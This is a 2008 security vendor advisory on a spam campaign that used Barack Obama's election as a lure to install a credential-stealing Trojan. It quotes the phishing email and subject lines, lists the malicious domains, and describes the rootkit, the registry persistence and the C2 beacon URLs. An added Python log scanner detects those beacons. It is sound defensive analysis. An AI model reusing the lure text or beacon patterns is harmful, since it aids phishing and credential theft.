Obama Speech Trojan (Nov 5, 2008)


SonicWALL UTM Research team observed a new spam campaign which uses yesterday’s US election as a social engineering mechanism to install a Trojan.

The email appears to be from news@bbc.com with the subject “Priorities for the New President”. The email body reads:

——————
Barack Obama Elected 44th President of United States

Barack Obama, unknown to most Americans just four years ago, will become the 44th president and the first African-American president of the United States.
Watch His amazing speech at November 5!

Proceed to the election results news page>>

2008 American Government Official Website
This site delivers information about current U.S. Foreign policy and about American life and culture.
—————

Some other subjects used are:

  • Barack Obama wins
  • Can Obama win popular vote but lose election?
  • Did Obama Win Yet?
  • Election 2008: Time lapse of U.S. counties
  • Election Center 2008 – Election Results
  • Election Night Results
  • Fear of a Black President
  • Obama win an Electoral College majority
  • Obama win Defined by Race
  • USA Election 2008 Results
  • World Welcomes Obama’s Win

The link goes to one of these fast-flux domains: bfiinwach.com, gerimumsoe.com, lopbiuemis.com, vcoenutrmsi.com, wconlinenrue.com.

If the link is clicked, a file named Adobe_flash9.exe is served to the user. It is 31,232 bytes in size and is compressed with the ASPack executable packer. It copies itself to %Windir%\9129837.exe and drops a rootkit to %Windir%\new_drv.sys, which it installs as a new kernel-mode driver.

It also modifies the registry:

 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] ttool = "%Windir%\9129837.exe"

so that 9129837.exe runs every time Windows starts.

The Trojan then connects over HTTP to 91.203.93.57 (hosted in Ukraine) and issues the following GET requests:

  • cgi-bin/options.cgi?user_id=3311905101&version_id=5&passphrase=fkjvhsdvlksdhvlsd&socks=22539&version=125&crc=00000000
  • cgi-bin/cmd.cgi?user_id=3311905101&version_id=5&passphrase=fkjvhsdvlksdhvlsd&socks=22539&version=125&crc=00000000

It exfiltrates stolen user IDs and passwords to the above IP.
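As an added detection example (not code from the original advisory), the following Python scanner flags the check-in pattern above in proxy logs. The C2 host, paths and query parameter names come from the advisory; the log line format and the sample entries are constructed assumptions.

```python
import re
from typing import Optional
from urllib.parse import urlsplit, parse_qs

# Values taken from the advisory above.
C2_HOST = "91.203.93.57"
C2_PATHS = {"/cgi-bin/options.cgi", "/cgi-bin/cmd.cgi"}
# The beacon always carries this parameter set; together they form a
# behavioural fingerprint that survives a change of C2 host or values.
BEACON_PARAMS = {"user_id", "version_id", "passphrase", "socks", "version", "crc"}

# Assumed log format: "<epoch> <client_ip> <method> <url> <status>"
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$")


def classify(url: str) -> Optional[dict]:
    """Return a finding for a beacon-shaped URL, or None."""
    parts = urlsplit(url)
    query = parse_qs(parts.query, keep_blank_values=True)
    # Require the whole parameter set: a partial match would fire on
    # unrelated CGI scripts that happen to use "version" or "user_id".
    if not BEACON_PARAMS.issubset(query):
        return None
    if parts.hostname == C2_HOST:
        reason = "known C2 host"
    elif parts.path in C2_PATHS:
        reason = "beacon path and parameter fingerprint"
    else:
        reason = "beacon parameter fingerprint"
    return {"host": parts.hostname, "path": parts.path,
            "user_id": query["user_id"][0], "reason": reason}


def scan_log(lines):
    """Run classify() over every GET in the log; return a list of findings."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and m["method"] == "GET":
            hit = classify(m["url"])
            if hit:
                hit["client"] = m["client"]
                findings.append(hit)
    return findings


# Constructed sample log: two real-pattern beacons, one benign CGI hit, and
# one beacon to a different host (198.51.100.7 is a documentation address).
SAMPLE_LOG = """\
1225900001 10.0.0.12 GET http://91.203.93.57/cgi-bin/options.cgi?user_id=3311905101&version_id=5&passphrase=fkjvhsdvlksdhvlsd&socks=22539&version=125&crc=00000000 200
1225900002 10.0.0.12 GET http://91.203.93.57/cgi-bin/cmd.cgi?user_id=3311905101&version_id=5&passphrase=fkjvhsdvlksdhvlsd&socks=22539&version=125&crc=00000000 200
1225900003 10.0.0.20 GET http://example.test/cgi-bin/options.cgi?page=2 200
1225900004 10.0.0.31 GET http://198.51.100.7/cgi-bin/cmd.cgi?user_id=12&version_id=5&passphrase=x&socks=1&version=125&crc=00000000 404
""".splitlines()
```

Matching on the full parameter set rather than only the IP keeps the rule useful after the fast-flux infrastructure rotates; `scan_log(SAMPLE_LOG)` returns three findings, with the `reason` field telling an analyst which signal fired.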

The Trojan is also known as TrojanSpy:Win32/Ursnif.gen!D (Microsoft) and Mal/Heuri-E (Sophos).

SonicWALL has released a GAV signature to protect against this threat: GAV: Games.C (Trojan)
